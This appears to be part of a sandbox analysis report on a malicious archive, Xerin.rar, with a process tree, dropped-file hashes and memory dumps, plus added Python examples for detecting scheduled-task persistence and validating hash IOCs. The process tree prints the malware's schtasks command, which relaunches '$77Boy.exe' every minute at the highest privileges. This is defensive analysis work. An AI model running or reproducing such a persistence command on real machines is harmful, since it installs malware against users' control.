          cmd: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77Boy" /tr "C:\Users\Admin\AppData\Roaming\$77Boy.exe"
          - Creates scheduled task(s)
          - C:\Windows\System32\Conhost.exe
            cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      - C:\Users\Admin\AppData\Local\Temp\Install.exe
        cmd: "C:\Users\Admin\AppData\Local\Temp\Install.exe"
        - Executes dropped EXE
  - C:\Users\Admin\Videos\Xerin\XerinFuscator.exe
    cmd: "C:\Users\Admin\Videos\Xerin\XerinFuscator.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\Videos\Xerin\XerinFuscator.exe
    cmd: "C:\Users\Admin\Videos\Xerin\XerinFuscator.exe"
    - Executes dropped EXE
    - Loads dropped DLL
    - Enumerates system info in registry
    - Suspicious use of AdjustPrivilegeToken
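The chain above ends with $77Boy.exe setting up two persistence mechanisms: a Run key (per the signature) and a scheduled task that relaunches a copy of itself from AppData\Roaming every minute with the highest run level. The following is an added example, not part of the sandbox report, of how a detection engineer might score that command line from process-creation telemetry (Sysmon Event ID 1 or Security 4688 command-line fields). The sample input is the schtasks and conhost command lines copied from the tree above plus one constructed benign task; the user-writable path list, the two-reason alert threshold and the note that the $77 prefix is the naming convention the r77 rootkit uses to hide objects are assumptions of this example, not findings of the report.

```python
"""Score schtasks.exe /create command lines for the relaunch-loop persistence
pattern seen in the report above.  Added example, not part of the report."""
import re
from dataclasses import dataclass, field

# Constructed input: the schtasks and conhost lines copied from the process
# tree above, plus one benign nightly task written for this example.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77Boy" /tr "C:\Users\Admin\AppData\Roaming\$77Boy.exe"',
    r'\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1',
    r'"C:\Windows\System32\schtasks.exe" /create /tn "NightlyBackup" /sc daily /st 02:00 /tr "C:\Program Files\Backup\backup.exe"',
]

# Profile locations a standard user can write to (assumed list for this
# example); scheduled-task binaries normally live under Program Files or Windows.
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\", "\\users\\public\\")

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted runs whole."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]


def parse_flags(tokens):
    """Map /flag -> value (or True for bare switches); keys are lower-cased."""
    flags, i = {}, 1                      # tokens[0] is the image path
    while i < len(tokens):
        if tokens[i].startswith("/"):
            key = tokens[i][1:].lower()
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                flags[key] = tokens[i + 1]
                i += 2
                continue
            flags[key] = True
        i += 1
    return flags


@dataclass
class Finding:
    cmdline: str
    task_name: str
    binary: str
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self):
        # Require two independent signals before alerting; one alone (a task
        # under AppData, say) is common in legitimate per-user installers.
        return len(self.reasons) >= 2


def assess(cmdline):
    """Return a Finding for schtasks /create lines, None for anything else."""
    tokens = tokenize(cmdline)
    if not tokens:
        return None
    image = tokens[0].strip('"').lower().rsplit("\\", 1)[-1]
    if image not in ("schtasks.exe", "schtasks"):
        return None
    flags = parse_flags(tokens)
    if "create" not in flags:
        return None
    name = str(flags.get("tn", ""))
    binary = str(flags.get("tr", ""))
    f = Finding(cmdline, name, binary)
    interval = str(flags.get("mo", "1"))  # schtasks defaults /mo to 1
    if str(flags.get("sc", "")).lower() == "minute" and interval.isdigit() and int(interval) <= 5:
        f.reasons.append(f"repeats every {interval} minute(s): a relaunch loop, not a maintenance job")
    if str(flags.get("rl", "")).lower() == "highest":
        f.reasons.append("/RL HIGHEST: runs with the highest privileges the creating user holds")
    if any(p in binary.lower() for p in USER_WRITABLE):
        f.reasons.append("task binary lives in a user-writable profile path")
    if name.startswith("$77") or binary.lower().rsplit("\\", 1)[-1].startswith("$77"):
        # Assumption of this example: the $77 prefix is the convention the r77
        # rootkit uses to hide files, processes and tasks; the report does not
        # name r77, so treat this as a lead to confirm, not a verdict.
        f.reasons.append("$77 prefix on task or binary name")
    if flags.get("f") is True:
        f.reasons.append("/f: silently replaces any existing task of the same name")
    return f


def scan(cmdlines):
    """Findings that cross the alert threshold, in input order."""
    return [f for f in map(assess, cmdlines) if f is not None and f.suspicious]


if __name__ == "__main__":
    for finding in scan(SAMPLE_CMDLINES):
        print(finding.task_name, "->", finding.binary)
        for reason in finding.reasons:
            print("   ", reason)
```

Run against the sample, only the $77Boy line crosses the threshold; it collects all five reasons, while the constructed nightly backup collects none and the conhost line is ignored because its image is not schtasks. The tokenizer deliberately does not use shlex, whose POSIX mode would eat the backslashes in Windows paths.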
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
- C:\Windows\system32\DllHost.exe
  cmd: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
- C:\Windows\System32\RuntimeBroker.exe
  cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\System32\RuntimeBroker.exe
  cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
- C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
- C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
  cmd: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
- C:\Windows\system32\SppExtComObj.exe
  cmd: C:\Windows\system32\SppExtComObj.exe -Embedding
- C:\Windows\System32\svchost.exe
  cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
- C:\Windows\system32\DllHost.exe
  cmd: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
- C:\Windows\System32\RuntimeBroker.exe
  cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\System32\CompPkgSrv.exe
  cmd: C:\Windows\System32\CompPkgSrv.exe -Embedding
- C:\Windows\System32\CompPkgSrv.exe
  cmd: C:\Windows\System32\CompPkgSrv.exe -Embedding
- C:\Windows\System32\RuntimeBroker.exe
  cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
- C:\Windows\System32\RuntimeBroker.exe
  cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
- C:\Windows\system32\wbem\wmiprvse.exe
  cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
- C:\Windows\System32\rundll32.exe
  cmd: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
- C:\Windows\servicing\TrustedInstaller.exe
  cmd: C:\Windows\servicing\TrustedInstaller.exe
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
- C:\Windows\System32\mousocoreworker.exe
  cmd: C:\Windows\System32\mousocoreworker.exe -Embedding
- C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
- C:\Windows\system32\DllHost.exe
  cmd: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
  Filesize: 152B
  MD5: 537815e7cc5c694912ac0308147852e4
  SHA1: 2ccdd9d9dc637db5462fe8119c0df261146c363c
  SHA256: b4b69d099507d88abdeff4835e06cc6711e1c47464c963d013cef0a278e52d4f
  SHA512: 63969a69af057235dbdecddc483ef5ce0058673179a3580c5aa12938c9501513cdb72dd703a06fa7d4fc08d074f17528283338c795334398497c771ecbd1350a
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
  Filesize: 152B
  MD5: 8b167567021ccb1a9fdf073fa9112ef0
  SHA1: 3baf293fbfaa7c1e7cdacb5f2975737f4ef69898
  SHA256: 26764cedf35f118b55f30b3a36e0693f9f38290a5b2b6b8b83a00e990ae18513
  SHA512: 726098001ef1acf1dd154a658752fa27dea32bca8fbb66395c142cb666102e71632adbad1b7e2f717071cd3e3af3867471932a71707f2ae97b989f4be468ab54
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
  Filesize: 6KB
  MD5: 1d82067de4e70409eb265ba2ef50e943
  SHA1: a608f99a9a666d77674caf1a7e0ce71b2442df98
  SHA256: 037934073b0ee5ee96a3691792c139635cb0be117d9a933670f5771df90bb61f
  SHA512: b751090f02b1a218bc83f6303820902275ff3447f568cffe2197ccbd1e631fed43c88c1a21c766af0f22ee397a59592b08df6cdfb2272703ac942df29f6b5088
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
  Filesize: 5KB
  MD5: 1838f79c9dcdfd0a1b87f90f4d8f0f30
  SHA1: 929b600985318309afa4db0e13cf8dfd244e9e62
  SHA256: c2443604e3012c4b0c04b10a107d5db635accf27112854367fc565193f33dce1
  SHA512: b4ed5480d678a5c03ce96aeb593e1004be82343926690705044b93e9cddb0b27189900f23384dadd89ce97fb896837ebcf04830e73aa4bced8a0d037667d8832
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
  Filesize: 6KB
  MD5: ce7883ce0aebdc7f3686471d9f2b4907
  SHA1: d2b5b2d413f16a523e97b286f633bd5b06e92d00
  SHA256: d61d3e44da3b702700d22bbebe495c550aaa3c61f671541c734ff36363b493a1
  SHA512: ddfbf425ce8e02820126bde327190af4eed718214fd5e47bd500d4ccd9ac34157ae81b26b41c98f7c0150ece676ff29fdf08964974e2e14363fe9abba4e092c8
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
  Filesize: 16B
  MD5: 6752a1d65b201c13b62ea44016eb221f
  SHA1: 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
  SHA256: 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
  SHA512: 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  Filesize: 10KB
  MD5: 6545579c101cb0453f29698b910a4d33
  SHA1: c8a20b90c4a559b5ff7c0c1cb5315bafa9c91c05
  SHA256: 8e19138bf7f2b8d6dd078b2d89b75da19f108632d941f30e44bc7e6222dd32de
  SHA512: e9ba39ee3c3e6ab9290f9b7b618f07d2dcbbff4c694ca10952f50196d7eb1ab79e96f020a9bc4835614b4e31f74dcaa6ea9cba4fb4483cb6f77d86a885e9b191
- C:\Users\Admin\AppData\Local\Temp\$77Boy.exe
  Filesize: 480KB
  MD5: 16ade5c3129fd42199fecb3f69535b84
  SHA1: 092c901bd1e59a76c90a02ebf08a24004e4515ab
  SHA256: a1d24de8f0d94088c41fffaa0544cbc047efb98da7700f74bd58db2daaf5ca82
  SHA512: ab867abb655e9d59cca88510d824819af9db57c60a942b96542519e4bbe41500e4f5184478db0f9a4b16114f33a429a1fe78301ddea11c5464031c79b97cbfab
- C:\Users\Admin\AppData\Local\Temp\40585F64.dll
  Filesize: 605KB
  MD5: e8fc38352862ee9f26ea98310ca6228b
  SHA1: d61ca1128339024007be84f2c3a30e30c597b61f
  SHA256: 6486fd7ba81fc1f22d2bea279e1655dea5a12539256fbba4f8975abda117172b
  SHA512: f0663851da02c62f0c36d2246d8186d12c60da98732f0bd4894011c25f00129bc556f6d7f7b229eb940c43d12c1a46a627141191ce5214e9dbc399515ee1214a
- C:\Users\Admin\AppData\Local\Temp\Guna.UI2.dll
  Filesize: 2.1MB
  MD5: 278752062981db6fe27ba55f5099b8ae
  SHA1: 8446637986cf4a24e9135ee5c54f3170600e1e83
  SHA256: 538e6ca6001d609e251f88243409a2cbc9bc0517751843e76485a2c335e7829b
  SHA512: 142ff82ca90ca63a6a854e866615d742b585c102e8c4de5c773edeb1ac30c2cc2f6bcb190da394e4aadb4ef9518d194d99904463d6e952170d2924b16fcb00a5
- C:\Users\Admin\AppData\Local\Temp\Install.exe
  Filesize: 163KB
  MD5: 1a7d1b5d24ba30c4d3d5502295ab5e89
  SHA1: 2d5e69cf335605ba0a61f0bbecbea6fc06a42563
  SHA256: b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
  SHA512: 859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa
- C:\Users\Admin\AppData\Local\Temp\XCore.dll
  Filesize: 444KB
  MD5: e66e01b948d384710e109e7d562581d4
  SHA1: ca4f9e82789ced5623792fd168f67b41abf20041
  SHA256: aab1a265f0049d3004e1deda5939237a29c7914a46ff0b46c8158ce5384bb4ef
  SHA512: 21b9309b4407e5e59c3d2af9c8791bcde06c8100beed9fcebb1a710254a3f83cea915fc2e4ce87371c16a43e6e43a46e151ca92cb38dedba9b9f47a5727d8e00
- C:\Users\Admin\AppData\Local\Temp\XLoader.dll
  Filesize: 526KB
  MD5: a67b3c5cf1da3dd42294c11e2ddc6df5
  SHA1: 422e8f46e4e977191ec788dce5a2623dbc232b58
  SHA256: 0649cf0c59f95bcc4f1ad77f70cc89522ef500d8b103bbe7ba418112c53bc2a4
  SHA512: 0deeeb282241b790fdf2646600f085fc2c73f9dd376bc503f5abe8387496620377ac330755d153384da5fb035b89bee86146c06c1872d54babc00cbbd358b225
- C:\Users\Admin\AppData\Local\Temp\XerinFuscatorFucker.exe
  Filesize: 639KB
  MD5: 2de060d3f9f6f67988efb330e29c4fc1
  SHA1: e1496de704b21489642e9c2f4908889f42bcbf10
  SHA256: ccc3947f54257accb39bc2e92aeca3e13e4e96c995682f1af8c3892b7fa2ba00
  SHA512: ce664f4ab1e7f3d2bf65acbfa613cc4db3c4a7720ac71bd3432d9e6b2944c1c19fd81c453e8e6c33fe31efba90d370dedec4c9530737c2078982550a71b8dfaa
- C:\Users\Admin\AppData\Local\Temp\XerinJunk.exe
  Filesize: 426KB
  MD5: 16ef6975c3a2e7b86768238a5b6018b6
  SHA1: f54dc4177eb5bbddaf66e26caa4151992512c47a
  SHA256: 1e7ab51a52876da677eb5d322831347902118ac65a77b7f80a8fc8c020756416
  SHA512: bf60d10f78b8ce04b471b733f298c07a7da759a24e4811d7b6352aae533ff1ee37fd62387cff12e80245a7b9a1d28197e1cc114ab0a7124cf226486c92378fe9
- C:\Users\Admin\Downloads\Xerin.rar
  Filesize: 8.2MB
  MD5: 34f0ba8a262fa353f023c00332f7d46c
  SHA1: ee3510ba715a48887e6dad294402f64db68f2485
  SHA256: a5de12a69cbf11e7558f43317c1cbfdd8eece3ad7c9b3b6e34db310704d3c337
  SHA512: fb058649c3cda1b4d9982c23b7b5ac71582b0fda2dc7f32c809bd0e964432f3d7686f0b7d72f668db9a973e070b73344b27fe715fa8ee9f3e1846d5b52dbb799
- C:\Users\Admin\Videos\Xerin\Data.txt
  Filesize: 30B
  MD5: 4eb99446804dd9182bba634b675f8820
  SHA1: 087c62695ff4ed06938e6435b5288a1a58f71fa9
  SHA256: 903423c6b5e691782e62f4c52abf2e4cbc3c8fa058d80c51e52afe96f63f80fd
  SHA512: 15168423762d476de5575ccedd6a9240cbc9cd5b07a0c5ad872de66d850532e65eaa8e58307ec08b597c6df9fa8d515194af3897e2ac41f20c4a9b5e5a817aea
- C:\Users\Admin\Videos\Xerin\XAuth.dll
  Filesize: 161KB
  MD5: c7d4a3ab07d02adc892e319bf3247fa4
  SHA1: 39100c0d278929fd287f18a4346ac69a0bfa5125
  SHA256: 4c8fb4e68ecb3e9ac2f9f24d99ead16413a125e7caa310662c28a68fd4f9818b
  SHA512: f3a1207b1db42726b9542fbc7c434a02b1642f9d0f6599572f5a74136743898c45c25e94caad208c3a50cae86541ba94849d0603531060e8eabd059a69600934
- C:\Users\Admin\Videos\Xerin\XerinFuscator.exe
  Filesize: 4.8MB
  MD5: 5a8bb4280a95729fab667f826792703b
  SHA1: 0139dbfa18441b79ccc87e082f05ff59e936d082
  SHA256: a6d109aa0a175087a583536f8d1dba93cfde21e9f217ed41ef086ef3df74ca5d
  SHA512: d770e2c639ddea88512d15a311933d31d54604d5343fa8957dee596393354565cb635ba26406d91c921b85afb8286dd0ad746654ae217db1d6b2c9e82d3a78fc
- C:\Users\Admin\Videos\Xerin\XerinFuscatorFucker.exe
  Filesize: 3.3MB
  MD5: aa23d82fde63f355d4f01e12938f5ec7
  SHA1: cf939269eab84173e1929c5eb24e4572716bace0
  SHA256: ad4dd00078cf32233c55acfbc14d0f2af9ad5111ee8a8afd541767850779dabb
  SHA512: f8fd652c8a36a8d34ff0c9c254f51df3dc8b6a3ccbbc5f5b1f30bb1ec37dec031e62b4007c8b89200099b8aab15244c4b417693c9d9cc7545ceabda50bd2f0e4
- C:\Windows\Temp\__PSScriptPolicyTest_fsalf341.vip.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
- \??\pipe\LOCAL\crashpad_2668_TIKTKDCBHFYBCCFP
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
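The sandbox exports this listing with each label fused onto its value (MD5<hex>, <path>Filesize), which is easy to mis-split when hashes are copied into a blocklist. The following added example (not part of the report) parses that raw shape, checks every digest for the expected hex length before accepting it, and drops entries whose digests are those of empty input: the crashpad pipe entry above carries exactly the MD5, SHA-1, SHA-256 and SHA-512 of zero bytes, so it names a handle the sandbox saw rather than content worth blocking, and loading it would match every empty file on the estate. The sample text embeds the Xerin.rar, $77Boy.exe and pipe entries copied from the listing plus one constructed entry with a truncated SHA256 to exercise the validation.

```python
"""Parse the flattened 'Downloads' listing of a sandbox report into checked
IOC records.  Added example, not part of the report."""
import hashlib
import re

# Constructed sample: three entries copied from the report's listing (the
# archive, the dropped $77Boy.exe, the crashpad pipe) plus one deliberately
# broken entry with a truncated SHA256.
SAMPLE = r"""
-
C:\Users\Admin\Downloads\Xerin.rarFilesize
8.2MB
MD534f0ba8a262fa353f023c00332f7d46c
SHA1ee3510ba715a48887e6dad294402f64db68f2485
SHA256a5de12a69cbf11e7558f43317c1cbfdd8eece3ad7c9b3b6e34db310704d3c337
SHA512fb058649c3cda1b4d9982c23b7b5ac71582b0fda2dc7f32c809bd0e964432f3d7686f0b7d72f668db9a973e070b73344b27fe715fa8ee9f3e1846d5b52dbb799
-
C:\Users\Admin\AppData\Local\Temp\$77Boy.exeFilesize
480KB
MD516ade5c3129fd42199fecb3f69535b84
SHA1092c901bd1e59a76c90a02ebf08a24004e4515ab
SHA256a1d24de8f0d94088c41fffaa0544cbc047efb98da7700f74bd58db2daaf5ca82
SHA512ab867abb655e9d59cca88510d824819af9db57c60a942b96542519e4bbe41500e4f5184478db0f9a4b16114f33a429a1fe78301ddea11c5464031c79b97cbfab
-
\??\pipe\LOCAL\crashpad_2668_TIKTKDCBHFYBCCFPMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
C:\Users\Admin\AppData\Local\Temp\constructed-bad-entry.binFilesize
1KB
MD500000000000000000000000000000000
SHA10000000000000000000000000000000000000000
SHA256deadbeef
"""

DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
LABELS = ("SHA512", "SHA256", "SHA1", "MD5")   # longest first so no short label claims a longer one's line
_HEX = re.compile(r"^[0-9a-f]+$")
# Digests of zero bytes, computed rather than hard-coded so they cannot be mistyped.
EMPTY = {alg: getattr(hashlib, alg.lower())(b"").hexdigest() for alg in DIGEST_LEN}


def _entries(text):
    """Group non-empty lines into entries; a bare '-' line separates entries."""
    cur = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "-":
            if cur:
                yield cur
            cur = []
        elif line:
            cur.append(line)
    if cur:
        yield cur


def _take_digest(rec, line):
    """Split 'LABEL<hex>' and keep the value only if it has the right length."""
    for label in LABELS:
        if line.startswith(label):
            value = line[len(label):].strip().lower()
            if len(value) != DIGEST_LEN[label] or not _HEX.match(value):
                rec["problems"].append(f"{label} should be {DIGEST_LEN[label]} hex chars: {value!r}")
            else:
                rec[label.lower()] = value
            return
    rec["problems"].append("unlabelled line: " + line)


def parse_downloads(text):
    records = []
    for lines in _entries(text):
        rec = {"path": None, "size": None, "problems": []}
        head, body = lines[0], lines[1:]
        if head.endswith("Filesize"):
            rec["path"] = head[: -len("Filesize")]
            rec["size"], body = (body[0], body[1:]) if body else (None, body)
        else:
            # No size line: the export fused the first digest label onto the
            # path and put the digest itself on the next line (the pipe entry).
            for label in LABELS:
                if head.endswith(label) and body:
                    rec["path"] = head[: -len(label)]
                    body = [label + body[0]] + body[1:]
                    break
            else:
                rec["problems"].append("unrecognised entry header: " + head)
        for line in body:
            _take_digest(rec, line)
        records.append(rec)
    return records


def is_empty_content(rec):
    """True when the recorded digests are those of zero bytes: the sandbox
    logged an artefact name but captured no data, so the hashes identify nothing."""
    return any(rec.get(alg.lower()) == EMPTY[alg] for alg in DIGEST_LEN)


def usable_iocs(records):
    """SHA256 values safe to load into a blocklist: well-formed and non-empty."""
    return {r["sha256"] for r in records
            if "sha256" in r and not r["problems"] and not is_empty_content(r)}


def lookup_bytes(data, records):
    """Match a blob (e.g. a file pulled from a host) against the usable IOC set."""
    digest = hashlib.sha256(data).hexdigest()
    if digest not in usable_iocs(records):
        return None
    return next(r for r in records if r.get("sha256") == digest)


if __name__ == "__main__":
    for rec in parse_downloads(SAMPLE):
        status = "EMPTY" if is_empty_content(rec) else ("BAD" if rec["problems"] else "ok")
        print(f"{status:5} {rec['path']}  {rec.get('sha256', '-')}")
```

On the sample, the two file entries parse cleanly, the pipe entry is recognised as empty content and excluded, and the constructed entry is rejected for its short SHA256; an empty blob therefore matches nothing even though its hash appears in the listing.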
- memory/388-247-0x00007FFE03030000-0x00007FFE03040000-memory.dmp
  Filesize: 64KB
- memory/388-240-0x000001AC93D50000-0x000001AC93D7B000-memory.dmp
  Filesize: 172KB
- memory/388-246-0x000001AC93D50000-0x000001AC93D7B000-memory.dmp
  Filesize: 172KB
- memory/532-251-0x000001B1A6C60000-0x000001B1A6C8B000-memory.dmp
  Filesize: 172KB
- memory/616-205-0x00000212FB460000-0x00000212FB485000-memory.dmp
  Filesize: 148KB
- memory/616-207-0x00000212FB490000-0x00000212FB4BB000-memory.dmp
  Filesize: 172KB
- memory/616-213-0x00000212FB490000-0x00000212FB4BB000-memory.dmp
  Filesize: 172KB
- memory/616-214-0x00007FFE03030000-0x00007FFE03040000-memory.dmp
  Filesize: 64KB
- memory/616-206-0x00000212FB490000-0x00000212FB4BB000-memory.dmp
  Filesize: 172KB
- memory/672-224-0x0000013800850000-0x000001380087B000-memory.dmp
  Filesize: 172KB
- memory/672-225-0x00007FFE03030000-0x00007FFE03040000-memory.dmp
  Filesize: 64KB
- memory/672-218-0x0000013800850000-0x000001380087B000-memory.dmp
  Filesize: 172KB
- memory/960-235-0x0000016335A40000-0x0000016335A6B000-memory.dmp
  Filesize: 172KB
- memory/960-236-0x00007FFE03030000-0x00007FFE03040000-memory.dmp
  Filesize: 64KB
- memory/960-229-0x0000016335A40000-0x0000016335A6B000-memory.dmp
  Filesize: 172KB
- memory/2204-96-0x0000000000C60000-0x0000000000FBE000-memory.dmp
  Filesize: 3.4MB
- memory/3212-1066-0x0000000000F20000-0x00000000013EE000-memory.dmp
  Filesize: 4.8MB
- memory/5136-133-0x0000000000940000-0x00000000009E6000-memory.dmp
  Filesize: 664KB
- memory/5136-1000-0x0000000005680000-0x0000000005686000-memory.dmp
  Filesize: 24KB
- memory/5136-1082-0x0000000009B30000-0x0000000009B6C000-memory.dmp
  Filesize: 240KB
- memory/5136-1002-0x00000000056D0000-0x00000000056E2000-memory.dmp
  Filesize: 72KB
- memory/5136-996-0x000000000B2A0000-0x000000000B3E2000-memory.dmp
  Filesize: 1.3MB
- memory/5136-990-0x0000000005EA0000-0x0000000005EBA000-memory.dmp
  Filesize: 104KB
- memory/5136-134-0x0000000005460000-0x00000000055BE000-memory.dmp
  Filesize: 1.4MB
- memory/5136-188-0x0000000009C50000-0x0000000009E0C000-memory.dmp
  Filesize: 1.7MB
- memory/5136-187-0x0000000008AC0000-0x0000000008CD4000-memory.dmp
  Filesize: 2.1MB
- memory/5136-183-0x0000000008880000-0x000000000888A000-memory.dmp
  Filesize: 40KB
- memory/5136-989-0x00000000068A0000-0x000000000692E000-memory.dmp
  Filesize: 568KB
- memory/5136-168-0x0000000007030000-0x00000000070C2000-memory.dmp
  Filesize: 584KB
- memory/5136-172-0x0000000006F80000-0x0000000006FFA000-memory.dmp
  Filesize: 488KB
- memory/5136-135-0x00000000071A0000-0x0000000007744000-memory.dmp
  Filesize: 5.6MB
- memory/5136-161-0x0000000006E60000-0x0000000006E90000-memory.dmp
  Filesize: 192KB
- memory/5136-148-0x0000000007C20000-0x00000000080EE000-memory.dmp
  Filesize: 4.8MB
- memory/5284-132-0x0000000000AB0000-0x0000000000B20000-memory.dmp
  Filesize: 448KB
- memory/5564-166-0x0000000000E90000-0x0000000000F16000-memory.dmp
  Filesize: 536KB
- memory/5564-1116-0x000000001CD50000-0x000000001CD5A000-memory.dmp
  Filesize: 40KB
- memory/5564-167-0x0000000001860000-0x0000000001868000-memory.dmp
  Filesize: 32KB
- memory/5692-178-0x000001EAE6CD0000-0x000001EAE6CF2000-memory.dmp
  Filesize: 136KB
- memory/5692-189-0x000001EAE7060000-0x000001EAE708A000-memory.dmp
  Filesize: 168KB
- memory/5692-191-0x00007FFE41620000-0x00007FFE416DE000-memory.dmp
  Filesize: 760KB
- memory/5692-190-0x00007FFE42FB0000-0x00007FFE431A5000-memory.dmp
  Filesize: 2.0MB
- memory/5696-1042-0x0000000000890000-0x0000000000D5E000-memory.dmp
  Filesize: 4.8MB
- memory/5936-199-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB
- memory/5936-200-0x00007FFE42FB0000-0x00007FFE431A5000-memory.dmp
  Filesize: 2.0MB
- memory/5936-202-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB
- memory/5936-192-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB
- memory/5936-194-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB
- memory/5936-201-0x00007FFE41620000-0x00007FFE416DE000-memory.dmp
  Filesize: 760KB
- memory/5936-193-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB
- memory/5936-195-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB